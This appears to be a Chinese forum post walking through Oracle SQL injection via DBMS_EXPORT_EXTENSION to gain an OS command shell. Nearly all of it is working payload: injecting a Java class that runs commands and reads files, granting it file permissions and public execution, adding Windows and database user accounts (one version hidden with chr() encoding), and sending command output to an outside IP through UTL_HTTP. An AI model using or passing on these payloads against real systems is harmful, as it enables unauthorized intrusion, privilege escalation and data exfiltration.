标题:
实例演示oracle注入获取cmdshell的全过程
作者:
admin
时间:
2012-12-18 12:21
标题:
实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
" }: f2 a$ j, f3 |
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
同时把后面步骤 提到的 对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
and '1'<>'11'||(
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
)
and '1'<>(
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
)
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select sys.LinxReadFile('c:/boot.ini') from dual
)
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者UTL_HTTP.request(:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
" H3 z( Y6 P" }# {; _
通过以下命令可以查看all_objects表的改变:
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>(
select user_id from all_users where username='LINXSQL'
)
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(
1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用的话可以考虑grant dba to 当前的User:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
)